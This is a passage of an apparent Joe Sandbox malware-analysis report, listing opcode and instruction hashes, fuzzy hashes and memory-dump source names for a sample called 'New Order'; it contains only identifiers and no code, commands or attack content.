                                                                                                                              • Opcode ID: c928d7f3be6f00ad8413db6ed718b9ff55858aafe2784c52a257f2a6fb1dd551
                                                                                                                              • Instruction ID: 00b000c129b93793f8fedbe4ea1514ac9d3c7d1c2d2beb5fb53e16885d7135e8
                                                                                                                              • Opcode Fuzzy Hash: c928d7f3be6f00ad8413db6ed718b9ff55858aafe2784c52a257f2a6fb1dd551
                                                                                                                              • Instruction Fuzzy Hash: BF21AE72600645AFD715EBACD840F6ABBB8FF58750F140069F904D7691D738EE40CBA9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: aef5c2abe0162159e3d11a3ae5a1a428a536da7dd5d88cd25cecd9973c72125f
                                                                                                                              • Instruction ID: ca8af9a1a7ba90994eab9b41c11b8b898b0df4d0284b428cd225c2715e93e424
                                                                                                                              • Opcode Fuzzy Hash: aef5c2abe0162159e3d11a3ae5a1a428a536da7dd5d88cd25cecd9973c72125f
                                                                                                                              • Instruction Fuzzy Hash: 0A21D0729043469BD712EF5DC844B5BBBECAFA0350F080466BD80D7251D734CB08C7A2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d55cb0d49199aac7f1f556c0b2272f8069bbedb95205ba23bfd5bba648d80eae
                                                                                                                              • Instruction ID: 47956b8ee7d01c42d8d255d1707f62a6c8d3ab45129c9cc992894101dcc88c80
                                                                                                                              • Opcode Fuzzy Hash: d55cb0d49199aac7f1f556c0b2272f8069bbedb95205ba23bfd5bba648d80eae
                                                                                                                              • Instruction Fuzzy Hash: 03213B32704695ABE327572C8C04B247B9AAF41B74F190364FA20FF6D2DBACCA41C211
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5b50c9f0bc15d7456cf70dd92db0a313700b8863a70455d9e3628142415e7069
                                                                                                                              • Instruction ID: 4e76ef872c3bb4216bbad6edd17bae5cc80485adb41360af05462d80f0a11b7c
                                                                                                                              • Opcode Fuzzy Hash: 5b50c9f0bc15d7456cf70dd92db0a313700b8863a70455d9e3628142415e7069
                                                                                                                              • Instruction Fuzzy Hash: CC217979211A019FC729DF29C901B56B7F5BF48B08F28846CA549CBB61E371EA42CF94
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ceb41bdfe20c18b148490ffddef408c9f4a3337a7aa5af617fb50bfe6bc4ecfd
                                                                                                                              • Instruction ID: e5e34cd2da227efbb677b064ebd91da170e620a5521bd90f75906aae52e17b1e
                                                                                                                              • Opcode Fuzzy Hash: ceb41bdfe20c18b148490ffddef408c9f4a3337a7aa5af617fb50bfe6bc4ecfd
                                                                                                                              • Instruction Fuzzy Hash: AD113A36380A157FE32656989C80FAB76D9DBD4B60F500028BB09CB380EB74EF008796
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5a9cce71d4bc2eb1064f86fde45cf3fc0c05440e019adee2841432224ce61ecd
                                                                                                                              • Instruction ID: bf877fe93b8cfbca07af661cdd2c0f1070150e202c6414d46620ff51e0306ae7
                                                                                                                              • Opcode Fuzzy Hash: 5a9cce71d4bc2eb1064f86fde45cf3fc0c05440e019adee2841432224ce61ecd
                                                                                                                              • Instruction Fuzzy Hash: 8121D6B1E00209ABCB20DFAAD8859AEFBF8FF98710F10012EE505E7340D6749A45CB55
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                              • Instruction ID: 12198b6a663409d04758c44bda10e30f7559b4bf58ed8b8910b99ab9d098a01e
                                                                                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                              • Instruction Fuzzy Hash: 6D218EB2A0020AEFDF129F98CC40BAEBBB9EF8A350F244419F900E7251D734DA509B50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                              • Instruction ID: d1841d0a04a5d4636b44d02a4450944dbdb7b0356dbbfc88458e882caf833e5a
                                                                                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                              • Instruction Fuzzy Hash: D211D073600A05AFD722DA48C840F9EBBB8EB80754F140029F601CF190D671EE44DB95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6d04685b9f54b5518342c8d7b18b795dc7a9eacc273ea998b8fae1a048563968
                                                                                                                              • Instruction ID: ee95d43864a04ae2fca9a334293d137e8179335f759d029179137124161296b8
                                                                                                                              • Opcode Fuzzy Hash: 6d04685b9f54b5518342c8d7b18b795dc7a9eacc273ea998b8fae1a048563968
                                                                                                                              • Instruction Fuzzy Hash: E211E631B006199BDB92CF4DC8C0916BBE5EF4B710B18407DEE08CF249D6B1DB418B90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                              • Instruction ID: ba1386106d5226e91436d413469cd559257553ced71626bb1545b2352f50329f
                                                                                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                              • Instruction Fuzzy Hash: FC217972600A45DFD7299F49C540A66BBE6FBD4B10F18887DE98AC7610C731EE01CB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5247889877131029e46d26b94a0c15c61f2e21509cfbf6ee7e88561387fdb6e2
                                                                                                                              • Instruction ID: 0a37727c089e662662cf1c83d9465aa2251ea21ba042bbcf6cd0e3381f73d338
                                                                                                                              • Opcode Fuzzy Hash: 5247889877131029e46d26b94a0c15c61f2e21509cfbf6ee7e88561387fdb6e2
                                                                                                                              • Instruction Fuzzy Hash: 62218E35A0060ADFCB15CF58C981A6EBBB5FF89318F20416DD105A7350C771AE46CBD0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3c0f48988cc93bc160ca25e73491cd148b070a5d67160635e1a3e5d72dec486d
                                                                                                                              • Instruction ID: bd64b72069c152c1315d42f0678c78dc0af56d4844e2d08d9582652c72bd22fa
                                                                                                                              • Opcode Fuzzy Hash: 3c0f48988cc93bc160ca25e73491cd148b070a5d67160635e1a3e5d72dec486d
                                                                                                                              • Instruction Fuzzy Hash: 7B218E75510A00EFD7218F6CC841F66B7F8FF84354F54892DE59AC7250EA30AA50CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7d05a13c71b83591407e34528f7456e2df7bc59efb349217a9184be9503e267e
                                                                                                                              • Instruction ID: 93c3f2b1ab15aab6d8fd6056b5da7bbf8d22d67f0badab50c751b192e6e7844b
                                                                                                                              • Opcode Fuzzy Hash: 7d05a13c71b83591407e34528f7456e2df7bc59efb349217a9184be9503e267e
                                                                                                                              • Instruction Fuzzy Hash: 1F112F333001245FCB1ADB29DC91A6B729BEFD5374B35462DDA22CB254ED30DA41C795
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d8646cc9320b715e9b63ec734a312410d52d6664845f543d87f3e8373c3c9f80
                                                                                                                              • Instruction ID: 53d8791f8447c59ce682004efe16f9758655f0b87e3037423cfac50282842dba
                                                                                                                              • Opcode Fuzzy Hash: d8646cc9320b715e9b63ec734a312410d52d6664845f543d87f3e8373c3c9f80
                                                                                                                              • Instruction Fuzzy Hash: 6411C672240518EFCB22DB5DCD40F9ABBA8EF95B64F254025F606DF251EA70EA01CBD0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1d755f2a1a2d97ce0f30f2aa320a846e0bfabb24605527ba7e276b2c67dfb7ee
                                                                                                                              • Instruction ID: c9a4b3a78bfffcc01a6ff328c62851a313c6d19564e507d5d057a92e2e91d368
                                                                                                                              • Opcode Fuzzy Hash: 1d755f2a1a2d97ce0f30f2aa320a846e0bfabb24605527ba7e276b2c67dfb7ee
                                                                                                                              • Instruction Fuzzy Hash: D211BF76A01206ABCB26CF5DC580E5ABBE9ABC4750B698279D905DB315F630DF00CBE0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                              • Instruction ID: cf66756848549f90df2ab55d6b380fdcf1f7714c7cd31304be40ee36283c8167
                                                                                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                              • Instruction Fuzzy Hash: 78110436A00909AFDB19CB58C841B9DBBB5EF84710F058269EC55E7340E631FE01CB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                              • Instruction ID: c6578a06a1996affb0e314402bc1e348788c749d0ef088cf1828ba39dbc975eb
                                                                                                                              • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                              • Instruction Fuzzy Hash: 192106B5A00B099FD3A0CF29D440B52BBF4FB48B10F10492EE98AC7B50E771E914CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                              • Instruction ID: b06401ec885b4729b7a65da48490105e70006192a9b36201f27a9e21187ed276
                                                                                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                              • Instruction Fuzzy Hash: 0311C232A20609EFE721AF4DCC44B5EBBE5EF45754F058428EA19DB160DB71EE40DB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 71633378730a8143fa800f85cc137b178f1c4070c4924e23c8dba9615e08d9d2
                                                                                                                              • Instruction ID: 512930c3f0e0b04d9180e792a45e076a8987d24cba22fb5a4e572f9c5eb9c7bc
                                                                                                                              • Opcode Fuzzy Hash: 71633378730a8143fa800f85cc137b178f1c4070c4924e23c8dba9615e08d9d2
                                                                                                                              • Instruction Fuzzy Hash: E1014932305689AFE32BA66DDC84F277B8DEF90395F050075F900EB251DA58DE00C2B2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5a141bb9ffaff96f2729c142624be58d5020222a710040e4518909d8144653c6
                                                                                                                              • Instruction ID: 0f401c91a13d445b6e7df06c48e51adb50f83569ab0df6db82333348136e7257
                                                                                                                              • Opcode Fuzzy Hash: 5a141bb9ffaff96f2729c142624be58d5020222a710040e4518909d8144653c6
                                                                                                                              • Instruction Fuzzy Hash: 57119E7628064DAFDB668F5DDD40B567BA8EB86B64F004219FA05CB691C370EA00CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 51eb7f855f2ce3614150a4357687a2a45c308552a6f6405cc51d592fcef90339
                                                                                                                              • Instruction ID: c07507ad2f922baccfad7795b872c1f2a581b1fc23e59b978600c887353e60f7
                                                                                                                              • Opcode Fuzzy Hash: 51eb7f855f2ce3614150a4357687a2a45c308552a6f6405cc51d592fcef90339
                                                                                                                              • Instruction Fuzzy Hash: C4117072A00615ABDB229B5DC980B5EFBB8EF84790F690459DA01E7244F730AB059BA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: df2c1d07ee078f30b89a6a2bc46d195f7bcf6327d181a8a1ad50c6f8195122e3
                                                                                                                              • Instruction ID: a88c0b1f67f1d17f9b4a9d779977dc73264b5b36f984fb00542a82a883158d96
                                                                                                                              • Opcode Fuzzy Hash: df2c1d07ee078f30b89a6a2bc46d195f7bcf6327d181a8a1ad50c6f8195122e3
                                                                                                                              • Instruction Fuzzy Hash: 53019E715011099FC726DB19E448F16BBF9EB95314F21816EE206CB6A4CB70AE86CF94
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                              • Instruction ID: d1fe456e000569de773af55c365dca3442b0f98ed8fe05f6c7ca29bdf0d51f47
                                                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                              • Instruction Fuzzy Hash: 0411E5722126D69BE723972CEA64B257B9CAF0075CF1900A0EF45D7642F728CA82C255
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                              • Instruction ID: 9a8a345abe7e3bee9b842ac2cb83206f59ea5922a23cdf968eac5438b91a17dd
                                                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                              • Instruction Fuzzy Hash: 33019236600109AFE721BF5CCC40F5A7AA9EB95B54F058424EA05DB261E771DF40C790
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                              • Instruction ID: f38a5a73cbab96c1f9040f419f1b800108ddbbd967dc762aec89b3412697e4a0
                                                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                              • Instruction Fuzzy Hash: F7012636608B219BCB318F19E840A33BBA8EF95B70700852DFE99CB381C731D400CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 50cdf3ca0990f19002b564dc782a91968c55a9af944d1bcc9a6c3b1e8570c393
                                                                                                                              • Instruction ID: f51703e78b66852d99852aaad0596137d446e9ab64d1730daa28d69133a91f19
                                                                                                                              • Opcode Fuzzy Hash: 50cdf3ca0990f19002b564dc782a91968c55a9af944d1bcc9a6c3b1e8570c393
                                                                                                                              • Instruction Fuzzy Hash: 9911A132241245EFDB26EF19CD80F167BB8FF54B54F2000A9FA05DB691D635EE01CA90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 19623b15249887d8d07f27dda0a7f072c5f3d8fb5987ae2c81036832e6f84c39
                                                                                                                              • Instruction ID: 28cd02acb2dfb6e1fdf5a8651c948414dd11269a99fc88f09e8160ff38cbdf3d
                                                                                                                              • Opcode Fuzzy Hash: 19623b15249887d8d07f27dda0a7f072c5f3d8fb5987ae2c81036832e6f84c39
                                                                                                                              • Instruction Fuzzy Hash: CE115E7154522DABEB65EB68CC41FE9B375AF04710F504194B314E60E1DB709F91CF85
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                                              • Instruction ID: 0a867468cb76801eb4e8a148c060bb55f71f9045484e389bae948700c3b76d76
                                                                                                                              • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                                              • Instruction Fuzzy Hash: 8501B57260415577EB259B5DC804B9B7F68EBC0B50F394015EA06DB280E674DB84C3F1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                              • Instruction ID: edf7cb7681aa361362e19c3de68b4cd9a20729ba72984c7e3b49936273947525
                                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                              • Instruction Fuzzy Hash: 2F0128322002148BEF52CA1DDC84B52776BFFC4714F5545A5ED45CF286DAB1CE81C390
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ca149c8651bdb9d241638ff316a1df675e385093c304a8b7145a3dacfc910d0c
                                                                                                                              • Instruction ID: eab0227004a211ba0b4aa8fa08b16bc968c78274be75df7870dcd1188936d31e
                                                                                                                              • Opcode Fuzzy Hash: ca149c8651bdb9d241638ff316a1df675e385093c304a8b7145a3dacfc910d0c
                                                                                                                              • Instruction Fuzzy Hash: 4011177790011DABCB12EB98CC80DDFBB7CEF48358F044166A906E7211EA34AB15CBE1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 776a3dae80ecac19a122d1354bc242dc989f879a8861ae81dcad34a887cbbd14
                                                                                                                              • Instruction ID: 174b8504d3d83ed8c66038be4bfc5cc994fa7ab67b18e7fc8d575cd77c87adb4
                                                                                                                              • Opcode Fuzzy Hash: 776a3dae80ecac19a122d1354bc242dc989f879a8861ae81dcad34a887cbbd14
                                                                                                                              • Instruction Fuzzy Hash: 2811A1766441469FDB11CF58D800BA6BBB9FB9A314F1D8159F848CB315E732ED81CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ebe65e9669814cab6915ae30ee279826264dd22a7ccb275dd9da0f0b511c24ec
                                                                                                                              • Instruction ID: 1199cff6d8107ec94190484e24b15b2429232379fa2b104641b4f61082c6e782
                                                                                                                              • Opcode Fuzzy Hash: ebe65e9669814cab6915ae30ee279826264dd22a7ccb275dd9da0f0b511c24ec
                                                                                                                              • Instruction Fuzzy Hash: 5A1118B1A0020D9FCB00DFA9D541AAEBBF8FF58350F10406AA905E7355D674EA018BA4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c956d5f08eab52ffd5d3d7274250c3d0d53ee30c97d4bddbabe621c7ae12919c
                                                                                                                              • Instruction ID: 54f6bf918d501eee7f0151548b755e20978a5f6a7f941c9619caeb67a1d3d4ac
